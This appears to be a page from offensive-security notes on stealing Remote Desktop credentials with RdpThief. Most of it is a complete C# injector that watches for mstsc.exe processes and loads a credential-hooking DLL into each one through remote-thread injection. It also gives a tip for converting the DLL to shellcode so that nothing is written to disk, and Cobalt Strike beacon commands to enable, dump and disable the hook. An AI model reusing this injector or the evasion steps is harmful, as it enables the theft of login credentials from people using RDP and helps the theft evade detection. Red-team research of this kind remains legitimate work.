RDP

Remote Desktop Protocol

RdpThief

Some custom code that waits for mstsc.exe to be run and loads the malicious library into it:

RdpThiefInjector.cs
using System;
using System.Threading;
using System.Diagnostics;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;

namespace RdpThiefInjector
{
    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);

        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);

        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
        static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
        public static extern IntPtr GetModuleHandle(string lpModuleName);

        static void Main(string[] args)
        {
            string dllName = @"C:\Temp\RdpThief.dll";
            HashSet<int> PIDs = new HashSet<int>();
            Console.WriteLine("[*] Joined the hunt for mstsc.exe processes...");
            while (true)
            {
                Process[] mstscProc = Process.GetProcessesByName("mstsc");
                if (mstscProc.Length > 0)
                {
                    for (int i = 0; i < mstscProc.Length; i++)
                    {
                        int processId = mstscProc[i].Id;
                        if (!PIDs.Contains(processId))
                        {
                            Console.WriteLine($"[+] Detected non-hooked process with PID={processId}");
                            IntPtr hProcess = OpenProcess(0x001F0FFF, false, processId);
                            IntPtr dllAddress = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
                            IntPtr outSize;
                            bool res = WriteProcessMemory(hProcess, dllAddress, Encoding.Default.GetBytes(dllName), dllName.Length, out outSize);
                            if (res)
                            {
                                Console.WriteLine("[+] WriteProcessMemory succeeded!");
                            }
                            else
                            {
                                Console.WriteLine("[-] WriteProcessMemory failed :(");
                            }
                            IntPtr loadLibraryAddress = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
                            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, loadLibraryAddress, dllAddress, 0, IntPtr.Zero);
                            if (hThread != null)
                            {
                                Console.WriteLine("[+] CreateRemoteThread succeeded!");
                                Console.WriteLine($"[*] Process {processId} is now hooked, look for creds in \"{System.IO.Path.GetTempPath()}\"");
                                PIDs.Add(processId);
                            }
                            else
                            {
                                Console.WriteLine("[-] CreateRemoteThread failed :(");
                            }
                        }
                    }
                }
                Thread.Sleep(5000);
            }
        }
    }
}

The DLL can be converted to shellcode with ConvertToShellcode.py (sRDI approach) and then be injected into the target process. That would help to avoid dropping the DLL to disk:

beacon> rdpthief_enable
beacon> rdpthief_dump
beacon> rdpthief_disable

Abusing CredSSP / TSPKG

Last updated